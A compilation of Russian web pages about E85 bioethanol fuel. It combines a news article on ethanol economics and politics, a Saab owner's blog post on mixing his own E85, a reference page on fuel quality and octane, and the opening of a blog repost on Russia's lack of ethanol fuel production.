Бензин е85

В последнее время в мировой прессе всё чаще публикуются сообщения об опасности и даже вредности массового перевода автомобилей на биоэтанол. Одно авторитетное мнение очень скоро оспаривается другим, не менее авторитетным.

Критика настолько жёсткая, что поневоле вызывает недоумение.

Как такое может быть: ведущие страны принимают энергетические стратегии, которые, если верить скептикам, совершенно бездумны и являются кратчайшим путём к масштабным экологическим и экономическим катастрофам? Где правда? Попробуем разобраться.

Противники сжигания этанола в двигателях внутреннего сгорания приводят убедительные доводы. Они не опровергают факта, что при использовании этилового спирта выхлоп автомобилей становится намного чище. Это действительно так.

Главная же беда — в самом производстве этого вида топлива, когда в атмосферу выбрасываются огромные количества углекислого газа. А значит, вся экологическая эффективность использования спиртосодержащих смесей сводится на нет.

И бравые лозунги о борьбе с глобальным потеплением, об изменении климата не только теряют свою актуальность, но даже смешны.

Вообще говоря, этиловый спирт можно получать из любых растений, лишь бы там в достаточном количестве содержались сахар и крахмал. Картофель, ячмень, пшеница, свёкла — всё подходит.

Но лучший вариант — сахарный тростник. Можно также перерабатывать различные отходы, например древесные опилки, но пока что это экономически невыгодно.

А потенциально рентабельные методы находятся в стадии разработки.

Правы они? И да и нет. Производство этанола действительно насыщает атмосферу парниковыми газами (ещё они называются GHG — от greenhouse gas) в количествах, сопоставимых с выбросами бензиновых двигателей внутреннего сгорания. Но у всякой монеты есть и обратная сторона.

Дело в том, что в процессе производства и сжигания 1 литра этанола из растительного сырья в атмосферу попадает ровно столько же CO2, сколько до этого было поглощено теми же самыми растениями в результате реакции фотосинтеза.

По сути производство этилового спирта есть не что иное, как «фотосинтез наоборот», с той лишь разницей, что в одном случае требуется солнечный свет, а в другом — выделяется тепло.

Когда биоэтанол получит глобальное распространение, а всё к этому и идёт, то «с банкой чистого спирта» можно будет не только ходить в гости, но и помогать тем несчастным на дороге, у которых совсем опустел бак. Если вас смущает цвет, то помните, что в отличие от пищевого топливный спирт не подвергается чересчур уж тщательной обработке.

Получается, биоэтанол абсолютно нейтрален в качестве источника парниковых газов. Значит — лучше от него не станет, но и хуже не будет, в отличие от продуктов переработки нефти. Есть у этилового спирта и ещё одно преимущество: положительный энергетический баланс. В зависимости от вида сырья последний может колебаться от 1,24 до 8.

То есть при сжигании этанола выделяется в несколько раз больше энергии, чем затрачивается при его производстве. В этом смысле «скандальное топливо» на порядок превосходит бензин или солярку.

Только вообразите себе расходы на разведку, добычу, транспортировку, переработку нефти, и вы поймёте, что топливный баланс нефтяных продуктов значительно меньше единицы.

Сам процесс заправки этанолом не содержит в себе ничего особенного — всё ровно так же, как и в случае с бензином. Однако сеть таких заправок сегодня ещё только развивается. Например, в США точек, где продают E85, сегодня насчитывается примерно полторы тысячи.

Но и без недостатков у C2H5OH не обходится. При сгорании 1 литра этилового спирта выделяется на 34% меньше энергии, чем при сгорании того же объёма бензина.

Выходит, что если заправлять автомобиль топливом с содержанием этанола (к примеру, широко пропагандируемой смесью с бензином E85), то расход топлива неизбежно возрастёт вплоть до этих самых 34% — всё будет зависеть от концентрации спирта в каждом конкретном случае.

Но с этой печальной картиной столкнутся лишь владельцы машин с двигателями, изначально рассчитанными на традиционный бензин и лишь затем адаптированными под новомодное топливо.

Из примерно тысячи европейских этанольных заправок почти 800 находятся в Швеции. Эта страна планирует лет через 20 вообще отказаться от нефти. Скандинавы уповают на гибриды, потребляющие этанол. На этой фотографии люди из Scania представляют новейший городской автобус.

Нельзя забывать, что октановое число этанола равно 105. Это означает, что его можно сжигать в двигателях с куда большей степенью сжатия. Так что, в принципе, двигатели, рассчитанные исключительно на новый источник энергии, должны быть уж никак не хуже нынешних бензиновых или дизельных собратьев.

И в плане экономичности, и в плане мощностных характеристик. А уж про экологию и говорить не приходится! Примерно на 80% уменьшаются выбросы углеродных соединений, а конкретно CO2 снижаются на 30%. Но заливать в такие машины бензин категорически нельзя — детонация мигом убьёт технологичный мотор.

Вот так выглядит стандартный завод по производству биоэтанола. Отличие от классических спиртовых заводов только в масштабах производства и количестве ректификационных колонн. Получают «зелёное» топливо, что называется, не отходя от кассы, прямо в поле. Это связано с тем, что транспортировка сырья серьёзно увеличивает себестоимость.

В этом смысле весьма пессимистично выглядят перспективы так называемых многотопливных (чаще всего битопливных) автомобилей. Они могут называться Flex Fuel, Flexifuel, BioFlex, Tri-Flex и как угодно ещё — всё зависит от фантазии фирм-производителей.

Про такие разработки мы писали уже не раз и не два. Причём если некоторые носят статус концептов, то другие — вполне себе серийные машинки.

Но у всех этих автомобилей есть один противный недостаток — этанол там сжигается неэффективно, ведь степень сжатия нельзя изменить, просто нажав кнопку на панели.

Не секрет, что наиболее дешёвым способом транспортировки жидких топлив является закачка их в трубопровод. Но в случае с этанолом появляется проблема. Он гигроскопичен, то есть впитывает из атмосферы воду и, следовательно, обладает повышенной коррозионной агрессивностью. Поэтому пока что топливный спирт перевозят автотранспортом или по железной дороге.

Получается забавная ситуация: на бензине Flexifuel-машина едет хорошо, а на E85 (если кто забыл, это коктейль из 85% этанола и 15% бензина), во-первых, плохо, а во-вторых, «жрёт» ощутимо больше. Да, биоэтанол дешевле бензина, но не намного.

Зря вы думаете, что с этим топливом сэкономите сколько-нибудь значимую сумму. Может даже случиться и так, что будут одни убытки. Смотря как ездить — на одной лишь «зелёной» ориентации недалеко окажешься.

Поэтому не удивляйтесь, что внедрение, казалось бы, перспективной идеи сопровождается законодательным регулированием, например в США и Бразилии.

Не стоит думать, что при заправке биоэтанолом машина наотрез отказывается ехать, подобно водородным аналогам. По сравнению с бензином E85 действительно обладает меньшей энергетической ценностью, но для её сгорания требуется меньше кислорода, поэтому в цилиндры можно впрыскивать большие количества топлива. В итоге мощность падает, но не настолько, чтобы водители приходили в ярость.

Стоит тормознуть и поговорить подробнее, ибо в этих странах внедрение биоэтанола зашло очень далеко. Бразильцы очень не любят топливные кризисы c 1973 года. И всячески стараются их предотвратить. Так, с 1975-го в стране функционирует масштабная биотопливная кампания.

Не стоит поэтому удивляться, что 4,5% площади Бразилии заняты плантациями сахарного тростника, а большинство местных автомобилей можно с чистой совестью причислить к заядлым алкоголикам.

За год миллион бразильских рабочих производит двадцать с лишним миллиардов (!) литров этанола.

В Бразилии существует целая отрасль по выращиванию сахарного тростника, со своими традициями и правилами. При производстве широко используется дешёвый ручной труд, что приносит сумасшедшие доходы местным «сахарным королям».

Иностранцы спят и видят, как бы принять участие в этанольном буме, но местные бизнесмены наотрез отказываются продавать свои предприятия. А если и соглашаются, то заламывают поистине космические цены.

Стоит заметить, что правительство их полностью поддерживает.

Назвать экономику этой страны зависимой от нефти никак нельзя. Выращивая и перерабатывая сахарный тростник, Бразилия полностью обеспечивает себя топливом и электричеством.

Всё это безусловно радует, но даже в бочке спирта нашлось место вездесущему дёгтю. Ради новых плантаций бразильцы вырубают леса Амазонки.

Можно назвать это странной и недальновидной политикой, а если сказать прямо — то это настоящий идиотизм. Как жить без «лёгких планеты»?

Сахарный тростник в Бразилии выращивают тысячи частных хозяйств. И это порождает некоторые проблемы. Ведь из тростника и сахар делают.

Поэтому когда в 1980-х годах резко выросли цены на сахар, производство этанола сократилось до такой степени, что людям стало элементарно нечем заправлять свои машины.

Сейчас правительство регулирует ситуацию и даже вложило в 2007 году 25 миллионов долларов в развитие новых технологий. В США же эта сумма равняется $385 миллионам.

Похожая ситуация складывается и в США. Президент Буш выдвинул программу «20 за 10», которая должна помочь к 2017 году снизить потребление бензина на 20%. За счёт чего? Разумеется, за счёт этанола.

К озвученному сроку власти намерены увеличить его производство до 30 с лишним миллиардов литров. За последние годы инвестиции только в исследования перевалили за 12 миллиардов долларов.

И это только начало.

В Америке производят этанола хоть и много, но всё-таки чуть меньше, чем в Бразилии. Правда, делают его не из тростника (он в Штатах расти не хочет), а из кукурузы. Такой вариант менее эффективен, а стало быть, себестоимость американского эталона выше бразильского.

Тем не менее программу активно продвигают власти многих штатов, и губернатор «кукурузного» Иллинойса, кандидат в президенты Барак Обама (Barack Obama), — не исключение.

Принимаются новые требования к бензиновому топливу, которое должно содержать 10% этанола (такая пропорция безопасна для традиционных двигателей).

Чтобы машину можно было заправлять топливом, содержащим более 10% этанола, необходимы некоторые переделки. «Мозг» мотора должен научиться определять концентрацию спирта и подбирать соответствующие режимы работы. Поскольку спирт содержит воду, модернизации требует и топливная магистраль. Кроме того, если автомобиль эксплуатируется в холодных условиях, надо подогревать топливо перед запуском.

Достигнут ли американцы своих целей? Каково будущее всей этой затеи с биоэтанолом? Пока что всё туманно. Ясно одно — рассчитывать на тотальный переход к спиртовым двигателям нереально.

Если предположить стопроцентную эффективность процесса переработки, то для того, чтобы только США перевести с нефти на этанол, нужно 75% сельскохозяйственных земель нашей планеты засеять соответствующими культурами.

Грубо говоря, если даже всю Луну засадить тростником, этого окажется недостаточно.

Массовое культивирование культур для производства этанола неизбежно окажет значительное влияние на сельское хозяйство. Фермеры не дураки — раз спрос на кукурузу растёт, они будут её сеять везде, где смогут.

А кто при этом подумает о миллионах голодающих жителей Земли? Поэтому многие исследователи и негодуют, утверждая, что «выращивать» биотопливо в то время, когда людям есть нечего, — низкое, подлое и вообще аморальное занятие.

Этанольный вопрос неизбежно связан с большой политикой. На фотографии справа вы видите, как президент США Джордж Буш и президент Бразилии Луис Инасиу Лула да Силва (Luiz Inacio Lula da Silva ) радуются окончанию очередного раунда трудных переговоров. Поэтому не удивляйтесь, если в будущем мы столкнёмся самыми разными пиар-кампаниями, прямо противоречащими друг другу.

Впрочем, к любой критике надо относиться со здоровой долей скептицизма. Сами по себе биотопливные программы вполне разумны и при грамотной реализации способны принести ощутимую пользу. Стоит только иметь в виду, что повсеместное внедрение этанола окажет ощутимое влияние на мировую экономику. И, разумеется, найдутся те, чьи интересы пострадают.

Пример: так называемый саммит «табачных королей» 1988 года, где боссы крупнейших компаний обсуждали, как бы нейтрализовать политику ВОЗ по борьбе с курением. И есть ли гарантия, что подобные действия не предпринимают сейчас все те, кто почувствовал угрозу нефтяному бизнесу? Всё-таки, как ни крути, а внедрение биотоплива — это вопрос не столько научный и экономический.

Здесь вступает в дело большая политика.

Источник: https://www.drive.ru/technic/2008/02/28/1055053.html

Биоэтанол E85 и прочие смеси. — Saab 9-5, 2.3 л., 2002 года на DRIVE2

Всем привет!

Возникло много вопросов по необходимости использования и реальности пользы от E85, посему решил расписать свое мнение по данному вопросу.

Что такое E85?E85 — это топливо которое активно используют многие страны, а именно смесь этанола (метилкарбинол/этиловый спирт с формулой C2H5OH (эмпирическая формула C2H6O) и бензина, как правило Аи95. Смесь состоит из 85% весовых спирта и 15% весовых Аи95.

Качественные характеристики спирта в смеси.Вся информация о спиртуозности используемого этанола, типа этанола по классу и денатурирован он или нет — противоречивая.

Спиртуозность — показатель процентного содержания спирта, все привыкли к 96,6% и наслышаны этим я надеюсь.

Вариантов изготовить абсолютный спирт(99%) много, но для изготовления топлива используется ректификат приближенный к медицинскому(96%). Например в АИ95 допускается 5% воды в продукте, на деле я думаю их больше.

Просто нереально, доступными простым смертным методами, снять головные фракции спирта с продуктом выше 97% содержания.

Тип используемого спирта — у этанола есть классы, из органолептических показателей в спирте определяют внешний вид, цвет, вкус и запах. Спирт питьевой должен быть прозрачной, бесцветной жидкостью с характерным вкусом и запахом.

Спирт вышей очистки: Как бы не звучало название, это самый не высший вид очистки.Спирт Базис:Спирт Экстра:Спирт ЛюксСпирт Альфа это топовый спирт питьевой.

Питьевой значит, что можно использовать для изготовления алкоголя, а не то что 96% можно пить! Но нам пить не нужно, нужно лить в бак.

На предприятиях готовятся спирты 1го и 2го сорта (гидролизный или сульфатный) ТУ 3-66-65 и куча прочих денатурированных спиртов, которые употребить внутрь будет нельзя, за счет количества химии и красителей в них. В нашем случае мы делаем медицинский ректификованный спирт 96-97% и это более чем хороший вариант, с минимальным количеством примесей, никак не влияющих на горение топлива.

Тобишь, для получения хорошего E85 необходим максимально чистый спирт, не важно какой марки, главное процентное содержание этанола.

Зачем он вообще нужен, этот ваш E85?Начну с плюсов:1) На процесс окисления топлива(горение) требуется меньше воздуха.

Сравним стехиометрические значения для бензина и для E85:

AFR при старте на холодную Бензин 14.1гр воздуха к 1гр топливаAFR при старте на холодную E85 9.3гр воздуха к 1 гр топлива

AFR для движения с закрытой петлей без нагрузок Бензин 14.7гр воздуха к 1гр топливаAFR для движения с закрытой петлей без нагрузок E85 9.75гр воздуха к 1 гр топлива

AFR на 1-1.2 бара наддува Бензин 13.1гр воздуха к 1гр топливаAFR на 1-1.2 бара наддува E85 8.6гр воздуха к 1гр топлива

AFR на максимальных нагрузках Бензин 11.8гр воздуха к 1гр топливаAFR на максимальных нагрузках E85 7.8гр воздуха к 1гр топлива

Вывод: На горение E85 требуется меньше воздушной массы, а значит мы имеем возможность прироста мощности не меняя турбину. Но не все так однозначно, читаем дальше! 🙂

Полный размер

Вот показатели для LAMBDA сенсоров и для AFR сенсоров.

2) Антидетонационные свойства (Октаноповышающие)Для получения бензинов АИ-95 и АИ-98 используется вреднейший из антидетонаторов, присадка МТБЭ (Метил-трет-бутиловый эфир) .

Есть еще соединения свинца в виде присадок, но они запрещены законом, так как вредны еще сильнее, на столько что могут убивать людей, но при этом самый дешевый вариант.

Есть марганцевые присадки и прочие, вот перечень их минусов:-Относительно низкая теплота сгорания и высокая агрессивность по отношению к резинам-Высокий уровень токсичности и нагарообразования в камере сгорания-Повышенный износ, нагарообразование на свечах зажигания и в камере сгорания

-Осмоление деталей двигателя и топливной системы. Увеличение износа деталей цилиндро-поршневой группы И ПРИ ВСЕХ ЭТИХ МИНУСАХ ОНИ ДАЮТ ПРИРОСТ ОКТАНОВОГО ЧИСЛА В 2-6 ПУНКТОВ!

Этил же в свою очередь имеет ряд преимуществ:— Октановое число E85(детонационная стойкость) 107 по исследовательскому и 89 по моторному методамАИ95 — ОЧ 95 по исследовательскому методу и 85 по моторному методу.

— Не нужны присадки так как является мощным атидетонаторомТемпература самовоспламенения АИ95 255 °C (в зависимости от примесей может быть ниже или выше если свинцовые соединения использованы)Температура самовоспламенения E85 >257°C E100 423°C

— Самый простой плюс — экология. Даже не стану ничего объяснять.

Минусы— Температура зажигания у E85 выше чем у Аи95, E85 +15°C у Аи95 -27°C, то есть при старте на холодную будет тяжеловато.— Удельная теплота сгорания для Бензина Аи95 46 МДж/кг, 11250 ккал/кгУдельная теплота сгорания E85 30 МДж/кг, 7150 ккал/кг

НО ЭТО НЕЛЬЗЯ НАЗВАТЬ МИНУСОМ! У Метанола например эти показатели ниже, но водометанол тащит, у Пропана, Бутана и прочих эти показатели выше чем у Дизельного топлива, но что-то не помню гонок на газу. Тобишь тут важно больше Октановое число, и запрос воздуха, отсюда и увеличение мощности двигателя на 20-30% грубого подсчета, и не спорь daemonbbb

Нужное тепло подвинет поршни вниз, а остаточное лишь крыльчатку разгонит и не перегреет двигатель.

Двигатель не термонагружен, заряжен и едет!???? Увеличение индикаторного КПД за счет снижения тепловых потерь! Ведь нас парит не удельная теплота сгорания, а теплопроизводительность спиртовоздушной смеси, которая +- равно бензиновоздушной смеси.

А помимо всего прочего могу забывать про понижение степени сжатия турбокорча и даже спокойно ее увеличивать полагаясь на спирты.

Так что не читайте статьи где говорится «Энергоплотность ниже бенза посему дешевле», чего же тогда пропан не дороже? или дизельное топливо не дороже? 🙂

Самая главная и заключительная частьДа, я не стал вдаваться в подробности с химией процессов и т.д. кому надо инфу сами найдете, либо открывайте ссылки ниже, На книгу ссылки нет, сканировать не буду.

Спорьте в х что E85 хрень полная, мне все равно, мой культурный корчелыга будет на этом ездить. Почему?Потому что я уверен в качестве своего топлива.

85% весовых 96,6-97%% моего спирта + 15% весовых Аи95-Аи98 с заправки Газпром Нефть (нравится мне Amul после их бенза) и я могу не думать о детонации в городе где летом +35 минимум. Изученные в доль и поперек ссылки прилагаю.

Вики Биоэтанол

E85 как ракетное топливо.Таблица с характеристиками чистого этанола E100Вики БензинУдельная температура сгоранияГОСТ 2084-77. Бензины автомобильные [17.05.18]Вики МТБЭУдельная теплота сгорания ВикиВыхлопные газы двигателяМетанол Вики( НЕ ВЕРЬТЕ ТАБЛИЦЕ — СПЛОШНАЯ ШЛЯПА ТАМ)Советую почитать про Стехиометрическую смесь, про Детонационную стойкость (Октановое число), про Цетановое число, про присадки в бензине которые поспособствуют износу двигателя,про Степень сжатия, посмотреть все ГОСТ'ы и ТУ по бензинам там есть очень много инфы про хреновое качество, вообще советую много читать! 🙂

P.S. Таблицу стехиометрических смесей можно использовать, чтоб понять, что ездить на газу — хрень! И выбрать топливо по бодрее если позволяет ECU с настройками под данный вид топлива. У нас есть только под E85!

Полный размер

Все необходимые карты и лимитеры Flex-Fuel прошивки имеются для Trionic'ов

Бензин дорогой и грязный, не ваш бро, мешайте его со спиртом: 10% спирта к 90% бенза, получайте выше октан, чище выхлоп и расход ниже на 1-2% судя по Пендосовским исследованиям. Даже без Flex-Fuel прошивки на любом авто можно использовать при наличии инжекторов и ECU с одной лямбдой!

Всем ровных дорог и высокого октана!

Источник: https://www.drive2.ru/l/528737550685175905/

Познавательно-развлекательный сайт с техническим уклоном для работы, развлечения и отдыха

Запасы энергии в виде, доступном для сохранения и конвертирования, называются топливом. В зависимости от вида, топливо преобразуется в энергию движения автомобиля различными способами, связанными с особенностью топлива. Этим объясняются конструктивные различия двигателей автомобилей.

В основном, в качестве топлива для двигателей, здесь будут рассмотрены проблемы, связанные с бензином и дизтопливом. У меня нет большого опыта работы с газовым топливом, это отдельная тема и требует специальной доработки автомобиля ..

. Однако, можете быть уверены — все, что получено из нефти, как и сама нефть — горит … И газ, и мазут, и моторное масло — только надо создать условия для горения … Иногда, условия возникают самостоятельно / спонтанно, и тогда …

Топливо — расположение

Топливо находиться в топливном баке, энергия электромобилей в аккумуляторах.

Топливо — причины неисправности

  • — Отсутствие топлива в баке / неисправность указателя топлива — Несоответствующий вид топлива — Некачественное топливо / дым белый, синий, детонация
  • — Перегретое топливо

Топливо — диагностика, тестирование

  1. — Специализированный тест качества топлива в сертифицированной организации контроля качества ГСМ — Тест на цвет / запах — Тест на примеси / воду / стружку
  2. — Тест на длительный отстой / послойность / масло / сажа

Топливо — дополнительная информация

  • Присадки в топливо : — полибутамин, очищают карбюраторы, инжекторы, впускной коллектор, впускные клапана, однако оставляют отложения в камере сгорания.
  • — полиэфирамин, очищают карбюраторы, инжекторы, впускной коллектор, впускные клапана, удаляет отложения в камере сгорания.

Двух / компонентное топливо

FFV — Fuel Flexible Vehicle, автомобили c топливом двухкомпонентного вида — E85, смесь неэтилированного бензина с 70 % и 83 % ethanol в зависимости от географического местоположения и времени года.

— E85 производится на заводе, простое смешивание этанола и бензина образует продукт с низким давлением пара, особенно зимой.

— E85 разработан для автомобилей FFV, максимум до 85% этанола (при отсутствии можно двигаться на обычном топливе), для экономии импорта сырой нефти для производства бензина.

— Этанол, в основном дистиллированное кукурузное масло (или пшеница, ячмень, или картофель). Бразилия, всемирный самый большой ethanol производитель, делает топливо из сахарного тростника.

  1. Преимущества : — более высокое октановое число — применяется в двигателях с высокой степенью сжатия (включая гоночные) — относительно дешевое топливо
  2. — снижение токсичности на 10%

Недостатки : — Необходимы сельхозугодия для выращивания продукта производства этанола — Для обработки 1 тонны зерна требуется 10 тонн воды — Пробег на E85 на 25% короче, чем на газе — Пробег гоночного автомобиля на чистом этаноле короче на 15% — Для компенсации пробега требуется +30% дополнительного топлива E85 — Выхлопной газ содержит CH3CHO (Acetaldehyde), особенно при наличии паров воды, это — канцерогенное вещество (neurotoxin), пары вызывают раздражение глаз, кожи и дыхательного тракта. Фактически, Acetaldehyde оценивается как один из наиболее опасных (худшие 10 %) к экосистемам и человеческому здоровью. — Энергия затраченная на производство этанола намного выше производимой этанолом энергии — E85 достаточно кислотное соединение, прокладки / уплотнения топливных соединений в FFV автомобилях — противокислотные. — Автомобили FFV выполнены без чистого алюминия, каучука (резины) и магния, с которыми реагирует E85. — E85 электропроводимое топливо, применение стандартных электробензонасосов может вызвать пожар, а также от любой искры.

— E10, E25 — малосодержащие этанол виды топлива. Обычная добавка к бензину 5.7% этанола +2% кислорода для улучшения окисления CO и HC (применяется многими бензиновыми заводами). E10 снижает пробег по сравнению с бензином на 5%.

Расход топлива и перерасход

Факторы перерасхода топлива автомобилем : — масса автомобиля / перегрузка грузом — просроченное ТО — пониженное давление колес — развал / схождение — кондиционер — открытые стекла окон — городской цикл движения газ / тормоз / газ …

— движение по пробкам в час пик с низкой скоростью — движение на пониженных передачах — превышение крейсерской скорости движения по магистрали — длительная работа на холостом ходу / ночевки на стоянке автомобилей — снижение мощности двигателя / обязательное увеличение расхода топлива

— снижение средней скорости движения автомобиля / обязательное увеличение расхода топлива

Внимание! Увеличение расхода топлива не обязательно указывает на снижение мощности двигателя … При отсутствии признаков и ошибок неисправностей — снижения мощности двигателя должно быть подтверждено на динамометрическом / мощностном стенде …

Факторы увеличения расхода топлива автомобилем

Факторы естественного увеличения расхода топлива автомобилем, связанные с условиями эксплуатации : — Зимнее время года +5% … +20% — Горные местности / высоты над уровнем моря / перевалы +5% …

+20% — Извилистые дороги / 5 поворотов на километр +10% — Работа в городах до 3 млн населения +2% на каждые 250000 человек населения — Работа в поселках со светофорами и знаками, до +5% — Работа в режиме автобус / такси +10% — Обкатка нового автомобиля / 1000 км +10% …

+20% — Эксплуатация более 5 лет +5% — Эксплуатация более 8 лет +10% — Складские грузоперевозки грузовиками на базах и предприятиях +10% — Спецтехника городского хозяйства при работе на пониженных скоростях +20% — Работа в карьере / полевых условиях без груза +20% — Работа в карьере / полевых условиях с грузом +40% — Работа в чрезвычайно-климатических / тяжелых дорожных условиях +35% … +50% — Учебная езда +20% — Климат-контроль / кондиционер +7% — Простой / прогрев, темп < +5 ; 1 час простоя = 10 км пробега -

— Загородные автомагистрали на равнинной слабохолмистой местности (высота над уровнем моря до 300 м) — снижение расхода топлива от вышеуказанного до 15%

Расход топлива, зависимость от нагрузки

КПД, коэффициент полезного действия двигателя напрямую зависит от приложенной нагрузки. Снижение нагрузки в 2 раза вызывает увеличение расхода в 2 раза.

Эта выкладка для стационарных двигателей и в пределах установленных кривых характеристик норм расхода топлива и мощности.

Расход топлива и пробег / выбег

MPG = miles per gallon = л/100км = километр * 1.61 per 3.79 л / какое расстояние проедет автомобиль на единице топлива, мера измерения расхода топлива автомобилем
перевод MPG в л/100 км = (3.79 / MPG * 1.

61 км) — 1 mpg = 235 л / 100 км — 5 mpg = 47 л / 100 км >>> точка среднего расхода грузовых автомобилей (примерно 35 л / 100 км) — 10 mpg = 23,5 л / 100 км — 15 mpg = 15,7 л / 100 км — 20 mpg = 11,7 л / 100 км >>> точка среднего расхода легковых автомобилей (примерно 10,5 л / 100 км) — 25 mpg = 9,4 л / 100 км — 30 mpg = 7,8 л / 100 км

— 35 mpg = 6,7 л / 100 км

Качество топлива

Особенности проявления некачественного топлива : — Повышение октанового числа бензина добавлением присадок-ферроценов убивает свечи зажигания — Предельное содержание в бензине смол и склонных к смолообразованию веществ приводит к зависанию клапанов и отложению нагара — Пониженное давление насыщенных паров может ухудшить пуск двигателя — Присадки ферроценовые (на основе железа), 2 мг/л — похожи на бензол, используется как антидетонационная присадка, также содержится в естественном виде : микроскопические примеси от ржавчины, окалины трубопроводов, продукты трения и т.д. — Присадки марганцевые, менее 1 мг/л, вредные и ядовитые, только фоновая концентрация. — Присадки МТБЭ (метилтретбутиловый эфир), до 15%/л — один из самых распространенных антидетонаторов, это не присадка, а высокооктановая добавка (собственное число RON = 117) и в разрешенной концентрации полезен для двигателя, МТБЭ содержит кислород, который улучшает полноту сгорания и тем самым снижает выбросы СО и СН. Повышенное содержание МТБЭ ведет к падению мощности, агрессивен к уплотнениям топливной системы и ускоряет процесс коррозии, способствует увеличению выбросов NOx азотных соединений. — Присадки ММА (монометиланилин), до 1,3%/л — вредные и ядовитые, может увеличивать октановое число (собственное число RON = 280, 3% сделают из 76 => 92 бензин). Повышенное содержание ММА приводит к увеличению нагарообразования. — Присадки метанол / метиловый спирт, до 3%/л — вредные и ядовитые, токсичен, летуч, поражает зрительный нерв, многоцелевое химическое вещество, применяется для увеличения октанового числа (собственное число RON = 156), мощности, крутящего момента и индикаторного КПД двигателя. Обладает моющими свойствами. Разъедает алюминивые детали топливных систем. При взаимодействии с водой способствует послойному расслоению бензина. В чистом виде применяется как топливо для спортивных / гоночных двигателей.

— Присадки бензол, до 1%/л — канцероген, токсикант, с наркотическим эффектом, применяется для повышения октанового числа (собственное число RON = 113) бензина, низкоэффективен.

Кислородо-содержащее / окисленное топливо

Использование кислородосодержащего бензина для снижения токсичности выбросов.
С начала 1970 гг. становиться практикой использовать для увеличения октанового числа бензина присадки MTBE и этанол в качестве отказа от использования свинца. Ужесточение норм токсичности выбросов способствовало производству кислородсодержащего бензина, с содержанием как минимум 2,7% кислорода.

Обычно, уровень кислорода достигается добавлением 15% метил третичного бутилового эфира (MTBE) или примерно 7,5% этанола (по объему).

Другие оксигенаты, которые потенциально могут использоваться в виде добавок — этил трет-бутиловый эфир (ETBE) — третичный амиловый метиловый эфир (TAME) — диизопропиловый эфир (DIPE) — третично-бутиловый спирт (TBA)
Однако, использование кислородосодержащего бензина повлекло жалобы на здоровье и загрязнение среды.

Проведенные исследования указали, что MTBE является канцерогенным, и механизмы, с помощью которых MTBE вызывает рак у животных не совсем понятны. MTBE должен рассматриваться как потенциальный риск для человека.

Однако, риски MTBE аналогичны или немного меньше, чем от испарений обычного бензина; существенно меньше, чем от бензола (канцероген входящий в бензин) и более, чем в 100 раз меньше, чем от 1,3-бутадиена, продукта канцерогенных выбросов неполного сгорания топлива.

Несколько моментов для разъяснения относительно окисленного топлива : — В результате закона 1990 года, в США, произошло использование окисленных и повторно пере / формулированных топлив. Окисленное топливо содержит кислород, находящийся в составе этанола или присадки MBTE и химически изменяет смесь. Обедненное топливо снижает выхлопную токсичность на выходе из глушителя. — Некоторые модели автомобилей с управлением в замкнутом цикле могут незначительно перерасходовать топливо (около 2%) при использовании окисленных топлив. Это вызвано обогащением системы впрыска при обнаружении излишка кислорода (добавленного в топливо) датчиком кислорода.

— компоненты топливной системы старых автомобилей могут быть повреждены (трубки, уплотнительные кольца, прокладки и другое) от алкоголя используемого в окисленных топливах. Смотреть руководство на предельные допустимые значения этанола и присадок MBTE.

Октановое число топлива

Октановое число бензина определяет его способность противостоять ненормальному детонационному сжиганию / горению топлива в цилиндре. — Нормальное горение топлива : при воспламенении — равномерное движение / распределение фронта горения с оптимальным ростом температуры и давления.

— Детонационное горение топлива : при воспламенении и равномерном движении / распределении фронта горения создаются условия температуры / давления в цилиндре провоцирующее самовоспламенение смеси за пределами фронта горения, образования 2-го фронта горения, соударение при встрече фронтов, преждевременное нарастание максимального давления и негативное воздействие на детали ЦПГ.

  • — Опережающее зажигание / дизелинг : преждевременное воспламенение воздушно / топливной смеси, до момента подачи искры на свечу цилиндра / точки угла зажигания, со всеми вытекающими последствиями раннего зажигания.
  • Октановое число RON / исследовательский метод, для одноцилиндрового двигателя с переменной степенью сжатия и средним открытием дросселя, при котором отсутствует детонация.
    — Параметры : 600 об/мин, Т = 125°C, УОЗ = 13° BTDC
  • Октановое число MON / моторный метод, для одноцилиндрового двигателя с переменной степенью сжатия и полным открытием дросселя, при котором отсутствует детонация.
    — Параметры : 900 об/мин, Т = 300°C, УОЗ переменный

Октановое число AKI — это среднее арифметическое значение между RON и MON. — Занижение октанового числа от требуемого : существует риск механического повреждения двигателя.

— Завышение октанового числа от требуемого : нет никакой причины / резона при эксплуатации в стандартных условиях. Положительный эффект для спортивных / гоночных автомобилей.

© internet / service manual / car & truck diagnostics people's allowance

19:07 28.11.2018

Контакт моя страница, общение по работе и дружба

  1. Главная страница сайта.
  2. Меню сайта — главные разделы.
  3. = = = Меню раздела = = =
  4. © techstop-ekb.ru / Екатеринбург / 2019

Источник: https://techstop-ekb.ru/ismi/210-fuel.htm

Почему в России отсутствует производство жидкого топлива с этанолом? Перспективы развития отрасли

?

Categories:

  • экология
  • авто
  • финансы
  • экономика
  • Cancel

Оригинал взят у a_forester в Почему в России отсутствует производство жидкого топлива с этанолом? Перспективы развития отрасли

    Сегодня во многих странах(США, ЕС, Бразилия) этиловый спирт (этанол) рассматривается не в качестве основы для производства алкогольных напитков, а как экологически чистое топливо из возобновляемого растительного сырья. На эти цели используется до 90% выпускаемого этанола.

    На мировом рынке производство биоэтанола, то есть этанола, изготовленного из возобновляемого растительного сырья, является наиболее быстрорастущей отраслью промышленности (до 20% в год).Его применение в качестве моторного топлива — широко распространенная практика. Основную часть биотоплива составляет именно биоэтанол.

    Какие же основные причины препятствуют развитию данной отрасли?

    Прежде всего сверхцентрализация власти, сложившияся в результате большевисткой революции 1917г., и последовавшее за ним уничтожение региональных и местных форм власти. Бюрократическая номенклатура, многочисленные федеральные контрольные органы, меры носящих запретительный характер не дают полноценно развиваться малому и среднему бизнесу. Выживают крупные корпорации, которые могут оказывать воздействие на государственном уровне на экономическую политику.    Также сырьевой тип экономики России, сложившихся после уничтожения СССР и государственного переворота 1993 г.

   Виды смесей бензинов с этанолом:

Е85 (смесь 85 % этанола и 15 % бензина; буква «Е» от английского Ethanol)Е5, Е7, Е10 — смеси с низким содержанием этанола (5, 7 и 10 весовых процентов, соответственно)Е20(распространён в Бразилии).Е100 (смесь 96 % этанола и 4 % воды, в силу того, что этанол гигроскопичен).

    Преимущества бензинов с добавлением этанола

     Смесь бензина и этанола, известная под названием E-10, используется в американскими автомобилистами вот уже четверть века. Использование E-10 разрешено всеми крупными производителями автомобилей.

Топливо Е-10, подходящее для использования во всех видах автомобилей, улучшает работу двигателя путем добавления 2-3 октановых единиц к детонационной стойкости топлива, противодействует перегреву двигателя, выполняет функцию антифриза топливопровода и не вызывает загрязнения топливной форсунки.

